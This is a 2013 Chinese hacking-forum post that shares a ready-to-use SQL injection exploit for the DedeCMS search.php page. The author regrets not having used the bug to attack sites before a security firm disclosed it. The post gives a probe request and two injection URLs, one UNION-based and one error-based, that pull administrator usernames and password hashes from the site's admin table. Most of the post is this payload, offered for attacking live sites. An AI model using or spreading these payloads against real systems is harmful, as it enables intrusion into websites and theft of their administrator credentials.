找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1949|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ# V- C: U( T5 M1 L- R5 q. V" ^

( ]2 x( l1 \/ U. R1 b哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。$ T" J. F1 j9 N6 u& F
" `8 f, E- \1 R3 k; g: g6 i
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& f* Y) i+ t' U, o1 E5 _9 u& G' ?2 @6 ~" Z
我一般是这样测试的:! {" w% _$ S" S% T5 X, R7 C$ L  A6 n

1 J8 @; R5 S9 w5 ]" g提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a% \6 D6 k( Y& c( Z2 D$ D& `- @

0 ~' R3 H. J# U4 n' i% J转载不加作者名的没JJ% ]& H3 n- h7 c  \. J  T. N+ N

) X! h6 f+ h$ X6 [作者:鬼哥
- j; b/ Y" @* f8 L% G$ R. L% A1 O2 B8 [) H5 H4 U9 n

* t9 w. m. f8 B  N) Z, ~" T5 n( _
' g! D( o) ^) H- H; N2 E: ^看结果如果提示6 Q  n' Y$ Y7 _
1 X2 @5 f7 ^: L* h* ?8 T
Safe Alert: Request Error step 2 !$ d# W, ~, e. U2 O" k' Y7 L

- n5 n5 x+ Z+ e% @那么直接用下面的exp
8 Q1 \) `! o8 y* I  S9 M$ M; ^8 v* u% W- `0 G
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
9 O* q+ S7 t6 t$ v. V  H, l. U+ h& W3 M' M

% v6 y  W4 W! y3 M  E看结果如果提示4 d7 w7 Y  |' ]' \! b; n& |
( ^( t8 V7 _/ x5 T9 a- l4 L
Safe Alert: Request Error step 1 !
2 w" |- j! D& Q# s/ G7 J4 q( }6 ?% h
那么直接用下面的exp
) a0 |: C; B" u9 P: X2 n) D! a+ C" M: F) p9 K. l  E
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
/ i1 K" L4 ^( d" e0 A! O8 |
% D3 Q4 D% v1 b+ L3 h: O5 K+ A. u7 Q" k4 n  p( W7 o
如果正常显示证明漏洞不存在了。
, s% c9 ^% ]$ P' O$ G/ ]0 L, V3 s5 O+ c; z5 H9 e
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表